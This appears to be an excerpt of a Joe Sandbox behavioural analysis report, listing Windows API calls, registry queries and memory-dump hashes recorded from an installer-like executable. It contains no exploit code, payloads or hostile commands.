                                                                                                                                          • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                                                          • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                                                          • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                                                          • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                                                          • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                                          • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                                                                        • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                                                                          • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                                                          • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                                                          • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                                                                          • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                        • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                                                                          • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                                                        • String ID: Setup
                                                                                                                                        • API String ID: 504348408-3839654196
                                                                                                                                        • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                                                        • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                                                                        • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                                                        • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                                                                        APIs
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue
                                                                                                                                        • String ID: $=H
                                                                                                                                        • API String ID: 3660427363-3538597426
                                                                                                                                        • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                                                        • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                                                                        • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                                                        • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                                        • String ID: .tmp
                                                                                                                                        • API String ID: 1375471231-2986845003
                                                                                                                                        • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                                                        • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                                                                        • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                                                        • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                                          • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                                          • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                                          • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                                          • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                                          • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                                                                          • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                                                                        • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                                        • API String ID: 3869789854-2936008475
                                                                                                                                        • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                                                        • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                                                                        • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                                                        • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                                                                        APIs
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close
                                                                                                                                        • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                                                        • API String ID: 3535843008-1113070880
                                                                                                                                        • Opcode ID: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                                                        • Instruction ID: 97ba07fcc0924f8d698b93a4c32f8f7a3ceb81663af41ec066a5e596666b9838
                                                                                                                                        • Opcode Fuzzy Hash: fe32ea5757c181cea0fad4739291adb7fe5cb56e5df920aee23c3361bee12acf
                                                                                                                                        • Instruction Fuzzy Hash: F5F09060700204ABEB00D6A8ACD2BAA3769D750304F60907FA1058F382C679EE019B5C
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
                                                                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                        • String ID: CreateFile
                                                                                                                                        • API String ID: 2528220319-823142352
                                                                                                                                        • Opcode ID: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                                                        • Instruction ID: b0794b45f16520e4762b2717541816a935241bfc2e667b83be7f23d95be3de9d
                                                                                                                                        • Opcode Fuzzy Hash: 2c7b4fae504844472e6a07c4f0bcfda842c0d735d71c8af9ff6e211e096a353b
                                                                                                                                        • Instruction Fuzzy Hash: 99E06D702403447FEA10FA69CCC6F4A77989B04728F10C152BA48AF3E3C5B9FC808A58
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open
                                                                                                                                        • String ID: System\CurrentControlSet\Control\Windows$;H
                                                                                                                                        • API String ID: 71445658-2565060666
                                                                                                                                        • Opcode ID: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                                                        • Instruction ID: 60e43675bb36a9eef4a15598a1848ca3f705ecc445ee8c9fe52fc6b05f1352bb
                                                                                                                                        • Opcode Fuzzy Hash: a11f376e1d034aeb0d9ae53f60934921bcd728bb93d306f1768079d63b1ffdfe
                                                                                                                                        • Instruction Fuzzy Hash: 29D09E72950128BB9B009A89DC41DFB775DDB15760F45441BF9049B141C5B4AC5197E4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
                                                                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                                                        • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                                                        • API String ID: 2906209438-2320870614
                                                                                                                                        • Opcode ID: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                                                        • Instruction ID: 7fba65882f7194314ab185764ebfac318737a269d5660949bdaf7135ffc1064c
                                                                                                                                        • Opcode Fuzzy Hash: 9d30f7af3022304e39d9007edb753d7b8512de14ad0f58a0e87bb64db50414c6
                                                                                                                                        • Instruction Fuzzy Hash: ECC08CA074860093CB40B3FA344320E1841AB8071FB10C07F7A04A66C7DE3C88088B2E
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                          • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorLibraryLoadModeProc
                                                                                                                                        • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                        • API String ID: 2492108670-2683653824
                                                                                                                                        • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                                                        • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                                                                        • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                                                        • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                        • Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                                                        • Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
                                                                                                                                        • Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
                                                                                                                                        • Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
                                                                                                                                        APIs
                                                                                                                                        • GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
                                                                                                                                        • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
                                                                                                                                        • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$Append$System
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1489644407-0
                                                                                                                                        • Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                                                        • Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
                                                                                                                                        • Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
                                                                                                                                        • Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
                                                                                                                                        APIs
                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
                                                                                                                                        • TranslateMessage.USER32(?), ref: 0042448F
                                                                                                                                        • DispatchMessageA.USER32(?), ref: 00424499
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4217535847-0
                                                                                                                                        • Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                                                        • Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
                                                                                                                                        • Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
                                                                                                                                        • Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
                                                                                                                                        APIs
                                                                                                                                        • SetPropA.USER32(00000000,00000000), ref: 0041666A
                                                                                                                                        • SetPropA.USER32(00000000,00000000), ref: 0041667F
                                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Prop$Window
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3363284559-0
                                                                                                                                        • Opcode ID: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                                                        • Instruction ID: 6913c5f2d07602d921388148e43cadd8ab2d6729f30613f48e4cae6714e3bc13
                                                                                                                                        • Opcode Fuzzy Hash: 953367bc10487f5f00132df45b9f4bdc07709d3a3f88142737615a1cc8063318
                                                                                                                                        • Instruction Fuzzy Hash: ACF01271701210ABDB10AB599C85FA732DCAB09714F16057AB905EF286C778DC40C7A8
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$AllocFree
                                                                                                                                        • String ID: uu
                                                                                                                                        • API String ID: 2087232378-2249551878
                                                                                                                                        • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                                                                                                        • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                                                                                                        • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
